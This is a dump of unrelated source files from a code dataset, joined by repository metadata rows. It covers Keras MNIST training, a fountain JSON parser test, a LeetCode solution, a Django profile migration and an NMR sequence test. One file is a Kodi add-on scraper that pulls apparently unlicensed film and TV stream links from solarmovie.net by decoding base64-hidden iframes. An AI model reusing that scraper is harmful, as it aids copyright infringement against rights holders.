train_data_dir = os.path.join(config.DATA_FOLDER_PATH, 'mnist', 'train')
validation_data_dir = os.path.join(config.DATA_FOLDER_PATH, 'mnist', 'test')
# Standard MNIST split sizes: 60k train / 10k test.
train_samples = 60000
validation_samples = 10000
epoch = 30
batch_size = 32
class TestMnistFlow(TestCase):
    """End-to-end training run: fit a model on the MNIST image directories.

    NOTE(review): uses Keras 1.x-era arguments (Convolution2D(16, 5, 5, ...),
    samples_per_epoch, nb_epoch, nb_val_samples) — assumes an old Keras; confirm
    before upgrading the dependency.
    """
    def get_model_simple(self):
        """Build and compile a small two-conv-layer CNN baseline (10-class softmax)."""
        model = Sequential()
        model.add(Convolution2D(16, 5, 5, activation='relu', input_shape=(img_width, img_height, 3)))
        model.add(MaxPooling2D(2, 2))
        model.add(Convolution2D(32, 5, 5, activation='relu'))
        model.add(MaxPooling2D(2, 2))
        model.add(Flatten())
        model.add(Dense(1000, activation='relu'))
        model.add(Dense(10, activation='softmax'))
        # ** Model Ends **
        model.compile(loss='categorical_crossentropy',
                      optimizer='rmsprop',
                      metrics=['accuracy'])
        return model
    def test_flow(self):
        """Train the VGG16-based MNIST model from directory generators (slow, full run)."""
        # ** Model Begins **
        model = get_vgg16_for_mnist((dimension, dimension, 3), 10)
        # model = self.get_model_simple()
        # Training images get light augmentation; validation only rescaling.
        train_datagen = ImageDataGenerator(
            rescale=1. / 255,
            shear_range=0.2,
            zoom_range=0.2,
            horizontal_flip=True)
        test_datagen = ImageDataGenerator(rescale=1. / 255)
        train_generator = train_datagen.flow_from_directory(
            train_data_dir,
            target_size=(img_width, img_height),
            batch_size=batch_size,
            class_mode='categorical')
        validation_generator = test_datagen.flow_from_directory(
            validation_data_dir,
            target_size=(img_width, img_height),
            batch_size=batch_size,
            class_mode='categorical')
        model.fit_generator(
            train_generator,
            samples_per_epoch=train_generator.n,
            nb_epoch=epoch,
            validation_data=validation_generator,
            nb_val_samples=validation_samples, workers=12)
        # model.save_weights('mnistneuralnet.h5')
"chris@fletch22.com"
] | chris@fletch22.com |
a4fd68b0396381878daf049a641dec0c58de016d | c5cb9d60da5bab94ccf4dfb28185315521cc2736 | /tests/fountain/test_program.py | 7edc24568ab6f69d4fee090c0a2202d98ada73c7 | [] | no_license | Let-it-Fountain/code-generator | 4aa93ed7688e064d727619f68c902823b5c99e4e | 25560af09d008d5501eb4f68e8db5bb2aeaa8461 | refs/heads/master | 2016-08-12T18:43:30.896931 | 2016-01-07T20:16:02 | 2016-01-07T20:38:42 | 49,221,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | import unittest
from fountain.command import ChangeNozzlePressureAndColorFountainCommand
from fountain.program import FountainProgram
class TestFountainProgram(unittest.TestCase):
    """Unit test for FountainProgram.parse_json."""
    def test_parse_json(self):
        """A three-command program parses into the expected command objects, in order."""
        # NOTE: the local name 'json' shadows the stdlib module (harmless here,
        # but rename it if the json module is ever needed in this scope).
        json = """{
            "version": 1,
            "commands": [
                {
                    "nozzle": 1,
                    "pressure": 42,
                    "color": "green",
                    "time": 5
                },
                {
                    "nozzle": 2,
                    "pressure": 3.14,
                    "color": "red",
                    "time": 2
                },
                {
                    "nozzle": 5,
                    "pressure": 0,
                    "color": "yellow",
                    "time": 10
                }
            ]
        }"""
        program = FountainProgram.parse_json(json)
        self.assertListEqual([ChangeNozzlePressureAndColorFountainCommand(1, 42, 'green', 5),
                              ChangeNozzlePressureAndColorFountainCommand(2, 3.14, 'red', 2),
                              ChangeNozzlePressureAndColorFountainCommand(5, 0, 'yellow', 10)],
                             program.commands)
| [
"0coming.soon@gmail.com"
] | 0coming.soon@gmail.com |
016b7f14678ca082a128d9d26d7fe538516f88ca | 298c86756b741b4c0b706f5178fd26d6d3b63541 | /src/301_400/0330_patching-array/patching-array.py | 272322d30bc46a5f36cd0da0e961270b3653ad2b | [
"Apache-2.0"
] | permissive | himichael/LeetCode | c1bd6afd55479440c21906bf1a0b79a658bb662f | 4c19fa86b5fa91b1c76d2c6d19d1d2ef14bdff97 | refs/heads/master | 2023-02-12T07:25:22.693175 | 2023-01-28T10:41:31 | 2023-01-28T10:41:31 | 185,511,218 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | class Solution:
def minPatches(self, nums: List[int], n: int) -> int:
patches, x = 0, 1
length, index = len(nums), 0
while x <= n:
if index < length and nums[index] <= x:
x += nums[index]
index += 1
else:
x <<= 1
patches += 1
return patches
| [
"michaelwangg@qq.com"
] | michaelwangg@qq.com |
8235e8dcebb8c85c71c21f2c8a9467bf62a6ff4b | e5a511e346f5be8a82fe9cb2edf457aa7e82859c | /Python/ListPrograms/shuffleList.py | 87719058859c7a7cc65a26310471c5e2ace1e816 | [] | no_license | nekapoor7/Python-and-Django | 8397561c78e599abc8755887cbed39ebef8d27dc | 8fa4d15f4fa964634ad6a89bd4d8588aa045e24f | refs/heads/master | 2022-10-10T20:23:02.673600 | 2020-06-11T09:06:42 | 2020-06-11T09:06:42 | 257,163,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | """Write a Python program to shuffle and print a specified list. """
from random import shuffle
words = list(input().split())
shuffle(words)
print(words) | [
"neha.kapoor070789@gmail.com"
] | neha.kapoor070789@gmail.com |
35e12a74b76bdfabf580cd443df340d7e4f27584 | 565548ff49844ed69ae16d5104e500f01c973402 | /models/PST.py | 2592e69433fc0f5746b4d5cfa9e4f09e85a9eae1 | [] | no_license | jaisenbe58r/Pebrassos | 159ce5a8b372590fd9368d9b5b3c1b0513895bba | 7516a1f7bbba78547af86a9858ee381224964d28 | refs/heads/master | 2023-02-27T05:42:50.652697 | 2021-01-31T20:57:59 | 2021-01-31T20:57:59 | 299,698,630 | 3 | 1 | null | 2021-01-31T20:58:01 | 2020-09-29T18:04:36 | Jupyter Notebook | UTF-8 | Python | false | false | 1,169 | py | """Copyright (c) 2020 Jaime Sendra Berenguer & Carlos Mahiques Ballester
Pebrassos - Machine Learning Library Extensions
Author:Jaime Sendra Berenguer & Carlos Mahiques Ballester
<www.linkedin.com/in/jaisenbe>
License: MIT
"""
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from Helpers import utils
from Model import Embed, Checkpoint
EPOCHS=80
PASOS=7
# Carga de datos para el entrenamiento
scaler, training_data, target_data, valid_data, valid_target, continuas, valid_continuas = utils.load_data(PASOS)
# Modelo a utilizar
model = Embed.crear_modeloEmbeddings(PASOS)
#Entrenamiento
history = model.fit([training_data['weekday'],training_data['month'],continuas], target_data, epochs=EPOCHS,
validation_data=([valid_data['weekday'],valid_data['month'],valid_continuas],valid_target))
# Guardamos Checkpoint del modelo
Checkpoint.save_model(model, scaler)
# Predicción de resultados
results = model.predict([valid_data['weekday'],valid_data['month'],valid_continuas])
print( 'Resultados escalados',results )
inverted = scaler.inverse_transform(results)
print( 'Resultados',inverted ) | [
"jsendra@autis.es"
] | jsendra@autis.es |
bbf4f55b09e09fe087a85c3b9f7f3de103ee6cff | 7c5b8af0ef2af6f43fad895bae835ea323b2c236 | /accounts/migrations/0001_initial.py | 76ce2fcad8a9b87b624eb374769fc175fa18fb89 | [] | no_license | Tushant/ariadne_tutorial | 51f0d30b79172adc7548b43db9d5abe4048464a6 | 73b9054a88df1d130cbc965e4c6e1d33c5a38063 | refs/heads/master | 2021-11-23T11:25:59.885883 | 2020-01-25T11:05:55 | 2020-01-25T11:05:55 | 236,158,115 | 1 | 1 | null | 2021-11-01T06:52:23 | 2020-01-25T10:56:34 | Python | UTF-8 | Python | false | false | 8,421 | py | # Generated by Django 3.0.2 on 2020-01-25 05:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(default='profile_default.jpg', upload_to='profile_images')),
('social_accounts', models.TextField(blank=True)),
('time_zone', models.CharField(blank=True, choices=[('-12.0', '(GMT -12:00) Eniwetok, Kwajalein'), ('-11.0', '(GMT -11:00) Midway Island, Samoa'), ('-10.0', '(GMT -10:00) Hawaii'), ('-9.0', '(GMT -9:00) Alaska'), ('-8.0', '(GMT -8:00) Pacific Time (US & Canada)'), ('-7.0', '(GMT -7:00) Mountain Time (US & Canada)'), ('-6.0', '(GMT -6:00) Central Time (US & Canada), Mexico City'), ('-5.0', '(GMT -5:00) Eastern Time (US & Canada), Bogota, Lima'), ('-4.0', '(GMT -4:00) Atlantic Time (Canada), Caracas, La Paz'), ('-3.5', '(GMT -3:30) Newfoundland'), ('-3.0', '(GMT -3:00) Brazil, Buenos Aires, Georgetown'), ('-2.0', '(GMT -2:00) Mid-Atlantic'), ('-1.0', '(GMT -1:00 hour) Azores, Cape Verde Islands'), ('0.0', '(GMT) Western Europe Time, London, Lisbon, Casablanca'), ('1.0', '(GMT +1:00 hour) Brussels, Copenhagen, Madrid, Paris'), ('2.0', '(GMT +2:00) Kaliningrad, South Africa'), ('3.0', '(GMT +3:00) Baghdad, Riyadh, Moscow, St. Petersburg'), ('3.5', '(GMT +3:30) Tehran'), ('4.0', '(GMT +4:00) Abu Dhabi, Muscat, Baku, Tbilisi'), ('4.5', '(GMT +4:30) Kabul'), ('5.0', '(GMT +5:00) Ekaterinburg, Islamabad, Karachi, Tashkent'), ('5.5', '(GMT +5:30) Bombay, Calcutta, Madras, New Delhi'), ('5.75', '(GMT +5:45) Kathmandu'), ('6.0', '(GMT +6:00) Almaty, Dhaka, Colombo'), ('7.0', '(GMT +7:00) Bangkok, Hanoi, Jakarta'), ('8.0', '(GMT +8:00) Beijing, Perth, Singapore, Hong Kong'), ('9.0', '(GMT +9:00) Tokyo, Seoul, Osaka, Sapporo, Yakutsk'), ('9.5', '(GMT +9:30) Adelaide, Darwin'), ('10.0', '(GMT +10:00) Eastern Australia, Guam, Vladivostok'), ('11.0', '(GMT +11:00) Magadan, Solomon Islands, New Caledonia'), ('12.0', '(GMT +12:00) Auckland, Wellington, Fiji, Kamchatka')], max_length=5)),
('languages', multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('aa', 'Afar'), ('ab', 'Abkhazian'), ('af', 'Afrikaans'), ('ak', 'Akan'), ('sq', 'Albanian'), ('am', 'Amharic'), ('ar', 'Arabic'), ('an', 'Aragonese'), ('hy', 'Armenian'), ('as', 'Assamese'), ('av', 'Avaric'), ('ae', 'Avestan'), ('ay', 'Aymara'), ('az', 'Azerbaijani'), ('ba', 'Bashkir'), ('bm', 'Bambara'), ('eu', 'Basque'), ('be', 'Belarusian'), ('bn', 'Bengali'), ('bh', 'Bihari languages'), ('bi', 'Bislama'), ('bo', 'Tibetan'), ('bs', 'Bosnian'), ('br', 'Breton'), ('bg', 'Bulgarian'), ('my', 'Burmese'), ('ca', 'Catalan; Valencian'), ('cs', 'Czech'), ('ch', 'Chamorro'), ('ce', 'Chechen'), ('zh', 'Chinese'), ('cu', 'Church Slavic; Old Slavonic; Church Slavonic; Old Bulgarian; Old Church Slavonic'), ('cv', 'Chuvash'), ('kw', 'Cornish'), ('co', 'Corsican'), ('cr', 'Cree'), ('cy', 'Welsh'), ('cs', 'Czech'), ('da', 'Danish'), ('de', 'German'), ('dv', 'Divehi; Dhivehi; Maldivian'), ('nl', 'Dutch; Flemish'), ('dz', 'Dzongkha'), ('el', 'Greek, Modern (1453-)'), ('en', 'English'), ('eo', 'Esperanto'), ('et', 'Estonian'), ('eu', 'Basque'), ('ee', 'Ewe'), ('fo', 'Faroese'), ('fa', 'Persian'), ('fj', 'Fijian'), ('fi', 'Finnish'), ('fr', 'French'), ('fy', 'Western Frisian'), ('ff', 'Fulah'), ('Ga', 'Georgian'), ('de', 'German'), ('gd', 'Gaelic; Scottish Gaelic'), ('ga', 'Irish'), ('gl', 'Galician'), ('gv', 'Manx'), ('el', 'Greek, Modern (1453-)'), ('gn', 'Guarani'), ('gu', 'Gujarati'), ('ht', 'Haitian; Haitian Creole'), ('ha', 'Hausa'), ('he', 'Hebrew'), ('hz', 'Herero'), ('hi', 'Hindi'), ('ho', 'Hiri Motu'), ('hr', 'Croatian'), ('hu', 'Hungarian'), ('hy', 'Armenian'), ('ig', 'Igbo'), ('is', 'Icelandic'), ('io', 'Ido'), ('ii', 'Sichuan Yi; Nuosu'), ('iu', 'Inuktitut'), ('ie', 'Interlingue; Occidental'), ('ia', 'Interlingua (International Auxiliary Language Association)'), ('id', 'Indonesian'), ('ik', 'Inupiaq'), ('is', 'Icelandic'), ('it', 'Italian'), ('jv', 'Javanese'), ('ja', 'Japanese'), ('kl', 
'Kalaallisut; Greenlandic'), ('kn', 'Kannada'), ('ks', 'Kashmiri'), ('ka', 'Georgian'), ('kr', 'Kanuri'), ('kk', 'Kazakh'), ('km', 'Central Khmer'), ('ki', 'Kikuyu; Gikuyu'), ('rw', 'Kinyarwanda'), ('ky', 'Kirghiz; Kyrgyz'), ('kv', 'Komi'), ('kg', 'Kongo'), ('ko', 'Korean'), ('kj', 'Kuanyama; Kwanyama'), ('ku', 'Kurdish'), ('lo', 'Lao'), ('la', 'Latin'), ('lv', 'Latvian'), ('li', 'Limburgan; Limburger; Limburgish'), ('ln', 'Lingala'), ('lt', 'Lithuanian'), ('lb', 'Luxembourgish; Letzeburgesch'), ('lu', 'Luba-Katanga'), ('lg', 'Ganda'), ('mk', 'Macedonian'), ('mh', 'Marshallese'), ('ml', 'Malayalam'), ('mi', 'Maori'), ('mr', 'Marathi'), ('ms', 'Malay'), ('Mi', 'Micmac'), ('mk', 'Macedonian'), ('mg', 'Malagasy'), ('mt', 'Maltese'), ('mn', 'Mongolian'), ('mi', 'Maori'), ('ms', 'Malay'), ('my', 'Burmese'), ('na', 'Nauru'), ('nv', 'Navajo; Navaho'), ('nr', 'Ndebele, South; South Ndebele'), ('nd', 'Ndebele, North; North Ndebele'), ('ng', 'Ndonga'), ('ne', 'Nepali'), ('nl', 'Dutch; Flemish'), ('nn', 'Norwegian Nynorsk; Nynorsk, Norwegian'), ('nb', 'Bokmål, Norwegian; Norwegian Bokmål'), ('no', 'Norwegian'), ('oc', 'Occitan (post 1500)'), ('oj', 'Ojibwa'), ('or', 'Oriya'), ('om', 'Oromo'), ('os', 'Ossetian; Ossetic'), ('pa', 'Panjabi; Punjabi'), ('fa', 'Persian'), ('pi', 'Pali'), ('pl', 'Polish'), ('pt', 'Portuguese'), ('ps', 'Pushto; Pashto'), ('qu', 'Quechua'), ('rm', 'Romansh'), ('ro', 'Romanian; Moldavian; Moldovan'), ('ro', 'Romanian; Moldavian; Moldovan'), ('rn', 'Rundi'), ('ru', 'Russian'), ('sg', 'Sango'), ('sa', 'Sanskrit'), ('si', 'Sinhala; Sinhalese'), ('sk', 'Slovak'), ('sk', 'Slovak'), ('sl', 'Slovenian'), ('se', 'Northern Sami'), ('sm', 'Samoan'), ('sn', 'Shona'), ('sd', 'Sindhi'), ('so', 'Somali'), ('st', 'Sotho, Southern'), ('es', 'Spanish; Castilian'), ('sq', 'Albanian'), ('sc', 'Sardinian'), ('sr', 'Serbian'), ('ss', 'Swati'), ('su', 'Sundanese'), ('sw', 'Swahili'), ('sv', 'Swedish'), ('ty', 'Tahitian'), ('ta', 'Tamil'), ('tt', 'Tatar'), ('te', 'Telugu'), 
('tg', 'Tajik'), ('tl', 'Tagalog'), ('th', 'Thai'), ('bo', 'Tibetan'), ('ti', 'Tigrinya'), ('to', 'Tonga (Tonga Islands)'), ('tn', 'Tswana'), ('ts', 'Tsonga'), ('tk', 'Turkmen'), ('tr', 'Turkish'), ('tw', 'Twi'), ('ug', 'Uighur; Uyghur'), ('uk', 'Ukrainian'), ('ur', 'Urdu'), ('uz', 'Uzbek'), ('ve', 'Venda'), ('vi', 'Vietnamese'), ('vo', 'Volapük'), ('cy', 'Welsh'), ('wa', 'Walloon'), ('wo', 'Wolof'), ('xh', 'Xhosa'), ('yi', 'Yiddish'), ('yo', 'Yoruba'), ('za', 'Zhuang; Chuang'), ('zh', 'Chinese'), ('zu', 'Zulu')], max_length=608)),
('stripe_customer_id', models.CharField(blank=True, max_length=50, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Freelancer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bio', models.TextField()),
('technologies', multiselectfield.db.fields.MultiSelectField(choices=[('html', 'HTML'), ('css', 'CSS'), ('js', 'JavaScript'), ('jq', 'JQuery'), ('re', 'React'), ('an', 'Angular'), ('vu', 'Vue'), ('php', 'PHP'), ('lv', 'Laravel'), ('sy', 'Symfony'), ('no', 'Node.js'), ('ex', 'Express.js'), ('my', 'MySQL'), ('ps', 'PostgresQl'), ('md', 'MongoDB'), ('py', 'Python'), ('dj', 'Django'), ('fl', 'Flask'), ('ja', 'Java'), ('c', 'C'), ('cpp', 'C++'), ('cs', 'C#'), ('oc', 'Objective-C'), ('sw', 'Swift'), ('go', 'Go'), ('rs', 'Rust'), ('rb', 'Ruby'), ('rr', 'Ruby On rails')], max_length=87)),
('stripe_account_id', models.CharField(blank=True, max_length=50, null=True)),
('active', models.BooleanField(default=False)),
('profile', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='accounts.Profile')),
],
),
]
| [
"programmertushant@gmail.com"
] | programmertushant@gmail.com |
8760723ee95d31f6a5cbdb418e9be59736b266df | 931ae36e876b474a5343d0608ef41da6b33f1048 | /062.py | 65898c09041b8f9ab2b9ef1e6e95318adaac13bd | [] | no_license | mucollabo/py100 | 07fc10164b1335ad45a55b6af4767948cf18ee28 | 6361398e61cb5b014d2996099c3acfe604ee457c | refs/heads/master | 2023-01-27T13:48:57.807514 | 2020-12-10T12:49:10 | 2020-12-10T12:49:10 | 267,203,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | import openpyxl
from openpyxl.styles import Alignment
import os
# 워크북(Workbook) 객체 만들기
wb = openpyxl.Workbook()
# 시트(Sheet) 객체 만들기
ws = wb.create_sheet(index=0, title='Merge')
wb.remove(wb['Sheet'])
# 데이터 입력하기
tuple_of_rows = ((1, 2),
(3, 4),
(5, 6),
(7, 8),
(9, 10),
)
for row in tuple_of_rows:
ws.append(row)
print(row)
ws.merge_cells(start_row=1, start_column=1, end_row=2, end_column=2)
A1 = ws.cell(row=1, column=1)
A1.value = 'Merged'
A1.alignment = Alignment(horizontal='center', vertical='center')
# 워크북의 변경내용을 새로운 파일에 저장
wb.save(os.path.join(os.getcwd(), 'output', 'create_workbook3.xlsx'))
| [
"mucollabo@gmail.com"
] | mucollabo@gmail.com |
cff20af9ca952b1c601ab44b87a8efd7effd6b35 | cff2b7c96ca0355a44116f6d18f026da69e412b0 | /script.module.Galaxy/lib/resources/lib/sources/en/Galaxy (31).py | 393be8d1d8c6c5e1d22fd97aa6d10bfc39403e53 | [
"Beerware"
] | permissive | krazware/therealufo | cc836e4e7049d277205bb590d75d172f5745cb7d | 4d6341c77e8c2cc9faec0f748a9a2d931b368217 | refs/heads/master | 2020-03-19T00:41:22.109154 | 2019-11-12T05:06:14 | 2019-11-12T05:06:14 | 135,496,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,918 | py | '''
The Martian Add-on
***FSPM was here*****
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re, urlparse, urllib, base64
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import cache
from resources.lib.modules import dom_parser2
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['solarmovie.net']
self.base_link = 'http://solarmovie.net'
self.search_link = '/search-movies/%s.html'
def movie(self, imdb, title, localtitle, aliases, year):
try:
clean_title = cleantitle.geturl(title)
search_url = urlparse.urljoin(self.base_link, self.search_link % clean_title.replace('-', '+'))
r = cache.get(client.request, 1, search_url)
r = client.parseDOM(r, 'div', {'id': 'movie-featured'})
r = [(client.parseDOM(i, 'a', ret='href'),
re.findall('.+?elease:\s*(\d{4})</', i),
re.findall('<b><i>(.+?)</i>', i)) for i in r]
r = [(i[0][0], i[1][0], i[2][0]) for i in r if
(cleantitle.get(i[2][0]) == cleantitle.get(title) and i[1][0] == year)]
url = r[0][0]
return url
except Exception:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['premiered'], url['season'], url['episode'] = premiered, season, episode
try:
clean_title = cleantitle.geturl(url['tvshowtitle'])+'-season-%d' % int(season)
search_url = urlparse.urljoin(self.base_link, self.search_link % clean_title.replace('-', '+'))
r = cache.get(client.request, 1, search_url)
r = client.parseDOM(r, 'div', {'id': 'movie-featured'})
r = [(client.parseDOM(i, 'a', ret='href'),
re.findall('<b><i>(.+?)</i>', i)) for i in r]
r = [(i[0][0], i[1][0]) for i in r if
cleantitle.get(i[1][0]) == cleantitle.get(clean_title)]
url = r[0][0]
except:
pass
data = client.request(url)
data = client.parseDOM(data, 'div', attrs={'id': 'details'})
data = zip(client.parseDOM(data, 'a'), client.parseDOM(data, 'a', ret='href'))
url = [(i[0], i[1]) for i in data if i[0] == str(int(episode))]
return url[0][1]
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
r = cache.get(client.request, 1, url)
try:
v = re.findall('document.write\(Base64.decode\("(.+?)"\)', r)[0]
b64 = base64.b64decode(v)
url = client.parseDOM(b64, 'iframe', ret='src')[0]
try:
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({
'source': host,
'quality': 'SD',
'language': 'en',
'url': url.replace('\/', '/'),
'direct': False,
'debridonly': False
})
except:
pass
except:
pass
r = client.parseDOM(r, 'div', {'class': 'server_line'})
r = [(client.parseDOM(i, 'a', ret='href')[0], client.parseDOM(i, 'p', attrs={'class': 'server_servername'})[0]) for i in r]
if r:
for i in r:
try:
host = re.sub('Server|Link\s*\d+', '', i[1]).lower()
url = i[0]
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
if 'other'in host: continue
sources.append({
'source': host,
'quality': 'SD',
'language': 'en',
'url': url.replace('\/', '/'),
'direct': False,
'debridonly': False
})
except:
pass
return sources
except Exception:
return
def resolve(self, url):
if self.base_link in url:
url = client.request(url)
v = re.findall('document.write\(Base64.decode\("(.+?)"\)', url)[0]
b64 = base64.b64decode(v)
url = client.parseDOM(b64, 'iframe', ret='src')[0]
return url
| [
"krazinabox@gmail.com"
] | krazinabox@gmail.com |
084b701db876a7a9cc96de46ba22410822435bef | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_201/2768.py | 40e17f65e0ef41dbbc7a6fbe6147c990164a2ac2 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | T = int(input())
for t in range(1, T + 1):
result = ""
N, K = [int(i) for i in input().split(" ")]
if N == K:
result = "{} {}".format(0, 0)
else:
s = [0 for i in range(N)]
for c in range(K):
Ls = [0 for i in range(N)]
Rs = [0 for i in range(N)]
for i in range(N):
if s[i] == 0:
try:
Ls[i] = s[i::-1].index(1) - 1
except ValueError:
Ls[i] = i
try:
Rs[i] = s[i+1:].index(1)
except ValueError:
Rs[i] = N - i - 1
mini = [min(Ls[i], Rs[i]) if s[i] == 0 else -1 for i in range(N)]
minimum = max(mini)
minIndex = [i for i in range(N) if mini[i] == minimum]
maxi = [max(Ls[i], Rs[i]) if i in minIndex else -1 for i in range(N)]
maxIndex = maxi.index(max(maxi))
maximum = max(maxi)
if len(minIndex) == 1:
s[minIndex[0]] = 1
else:
s[maxIndex] = 1
result = "{} {}".format(maximum, minimum)
print("Case #{}: {}".format(t, result)) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
c92647660bee53af23986221cb7ab6c32ab5ce7f | 8a3d282ffb9830b01a3b698e2930ba8da6617d99 | /Lesson4/exercise1.py | 325205e8b230c4e4ebd0d2c7fbf211e9164ab04a | [] | no_license | papri-entropy/pynet-py3 | 08ba96adc9e0163990c7a8064ed8207b898748ff | 5554fa8a61b2e57f652046815e60f1b6db361d1e | refs/heads/master | 2023-04-03T17:51:45.105739 | 2021-04-15T14:33:05 | 2021-04-15T14:33:05 | 344,288,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | #!/usr/bin/env python
"""
1. Create a dictionary representing a network device. The dictionary should have key-value pairs representing the 'ip_addr', 'vendor', 'username', and 'password' fields.
Print out the 'ip_addr' key from the dictionary.
If the 'vendor' key is 'cisco', then set the 'platform' to 'ios'. If the 'vendor' key is 'juniper', then set the 'platform' to 'junos'.
Create a second dictionary named 'bgp_fields'. The 'bgp_fields' dictionary should have a keys for 'bgp_as', 'peer_as', and 'peer_ip'.
Using the .update() method add all of the 'bgp_fields' dictionary key-value pairs to the network device dictionary.
Using a for-loop, iterate over the dictionary and print out all of the dictionary keys.
Using a single for-loop, iterate over the dictionary and print out all of the dictionary keys and values.
"""
from pprint import pprint
device = {
'ip_addr': '4.4.4.4',
'vendor': 'cisco',
'username': 'admin',
'password': 'secret'
}
print("*" * 80)
print(device['ip_addr'])
print("*" * 80)
if device['vendor'].lower() == 'cisco':
device['platform'] = 'ios'
elif device['vendor'].lower() == 'juniper':
device['platform'] = 'junos'
print("*" * 80)
print(device['platform'])
print("*" * 80)
bgp_fields = {
'bgp_as': 65000,
'peer_as': 65001,
'peer_ip': "1.1.1.2"
}
device.update(bgp_fields)
for key in device.keys():
print(key)
print("*" * 80)
for key, value in device.items():
print(f"{key:>15} ---> {value:>15}") | [
"cosminpetrache4@gmail.com"
] | cosminpetrache4@gmail.com |
1c77ea48c7fcd5eb428149cef29095ba678ce323 | d9a22d4dcdfc0c28176c0e8afd784b30d275597e | /test_suite/system_tests/sequence.py | 6366e36289697ac02974e7ee733bfa98c9e73436 | [] | no_license | jlec/relax | fda1b3ff77be0afc21c2e6cc52348ae7635cd07a | c317326ddeacd1a1c608128769676899daeae531 | refs/heads/master | 2016-09-08T00:27:57.256090 | 2015-02-10T12:24:55 | 2015-02-10T12:24:55 | 30,596,131 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,738 | py | ###############################################################################
# #
# Copyright (C) 2006-2015 Edward d'Auvergne #
# Copyright (C) 2013-2014 Troels E. Linnet #
# #
# This file is part of the program relax (http://www.nmr-relax.com). #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
# Python module imports.
from os import sep
# relax module imports.
from data_store import Relax_data_store; ds = Relax_data_store()
from status import Status; status = Status()
from test_suite.system_tests.base_classes import SystemTestCase
class Sequence(SystemTestCase):
"""Class for testing the sequence functions."""
def setUp(self):
"""Set up for all the functional tests."""
# Create the data pipe.
self.interpreter.pipe.create('mf', 'mf')
def test_load_protein_asp_atoms_from_pdb(self):
"""Load all aspartic acid atoms from the single residue in a loaded protein PDB file."""
# Read the PDB file.
self.interpreter.structure.read_pdb(file='Ap4Aase_res1-12.pdb', dir=status.install_path + sep+'test_suite'+sep+'shared_data'+sep+'structures', read_model=1)
# Load all the ASP atoms (1 molecule, 1 ASP residue, and all atoms).
self.interpreter.structure.load_spins(spin_id=':ASP')
# Test some of the sequence.
self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, 'Ap4Aase_res1-12_mol1')
self.assertEqual(len(cdp.mol[0].res), 1)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, 7)
self.assertEqual(cdp.mol[0].res[0].name, 'ASP')
self.assertEqual(len(cdp.mol[0].res[0].spin), 12)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, 78)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, 'N')
self.assertEqual(cdp.mol[0].res[0].spin[1].num, 79)
self.assertEqual(cdp.mol[0].res[0].spin[1].name, 'H')
self.assertEqual(cdp.mol[0].res[0].spin[2].num, 80)
self.assertEqual(cdp.mol[0].res[0].spin[2].name, 'CA')
self.assertEqual(cdp.mol[0].res[0].spin[3].num, 81)
self.assertEqual(cdp.mol[0].res[0].spin[3].name, 'HA')
self.assertEqual(cdp.mol[0].res[0].spin[4].num, 82)
self.assertEqual(cdp.mol[0].res[0].spin[4].name, 'CB')
